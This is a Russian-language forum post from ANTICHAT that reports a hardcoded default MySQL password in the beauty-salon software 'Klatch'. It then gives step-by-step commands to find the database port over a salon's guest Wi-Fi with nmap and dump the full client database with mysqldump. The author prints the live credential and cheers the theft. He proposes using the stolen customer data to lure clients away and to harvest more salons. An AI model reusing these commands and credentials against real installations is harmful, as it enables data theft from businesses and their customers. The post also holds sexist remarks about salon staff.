HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.11.2017, 22:22
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от None  
Данная статья написана исключительно в образовательных целях. Я не преследую никакого злого умысла и, тем более, не подталкиваю никого к совершению противоправных действий
Как то по опыту работы пришлось столкнуться с программой «Клатч», которую использую, как систему управления предприятиями индустрии красоты, подробней с программой и как таковой системой, вы можете ознакомиться на официальном сайте данного пациента

https://evolution-it.ru



В рамках изучения функционала, для более плотного понимания программы была скачена демо версия и развернута локально на компе, в месте с программой также ставится локально MySql сервер, где в принципе и хранятся данные, логины/пароли, данные клиентов, закупы, расходы, контрагенты, в общем, вся чувствительная информация для бизнеса. В корне программы присутствует файл с настройками подключения к БД Klatch.ini и вот пример его записи:

Код:
Code:
[connection]
host=127.0.0.1
user=metaUser
pswd=d3578efe-8825-432c-bf72-cd1d0a65de30
db=klatch_demo
это конечно все интересно и занимательно, НО! Мне также довелось пощупать и лицензионную версию в действующем салоне красоты, и там точно такой же конфиг всего лишь с разницей в название BD:

Код:
Code:
db=klatch
т.е. как следствие логин пасс к бд идет по умолчанию! Мы все прекрасно знаем, как часто люди редактируют дефолтные настройки, да ещё и к тому-же , женская аудитория, у которой мозг забит «красотой» или сисадмин который получает копейки в подобных местах.

Сейчас очень популярно стало в публичных местах, салоны красоты не исключение, ставить публичные wi-fi для клиентов. Как для любого бизнеса, утечка клиентских данных очень критична! Может увести клиентов к конкурентам при рекламной рассылке с более выгодными условиями, акциями и скидками.

Я решил смоделировать ситуацию, где установлена программа в сети под wi-fi’ем и ноут в качестве посетителя данной сети, и вот что мы получаем….

Подключаемся к сети и смотрим внутренний IP сети, командой “ipconfig”



Далее берем nmap и ставим на поиск открытого порта MySql в сети и его брут по дефолтному логин/пасс:

nmap -p 3306 -n —open —script mysql-brute —script-args userdb=mysql_user.txt,passdb=mysql_pass.txt 192.168.1.0/24



Запросом «mysqldump -h 192.168.1.233 -u metaUser -pd3578efe-8825-432c-bf72-cd1d0a65de30 klach > dump.sql» дампим к себе Бд где и есть заветная клиентская база данных клиентов.

Отличненько!!! Вот теперь можно заняться промывкой мозгов, потенциальных клиентов и продолжить собирать базы с салонов использующих данную программу.

Это еще не всё! Пользователь metaUser имеет файловые привилегии, что позволяет читать и создавать файлы со своим содержимым, что раскрывает для нас дополнительный вектор атаки, но это уже совсем другая история.



P.S: Зеркало статьи
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ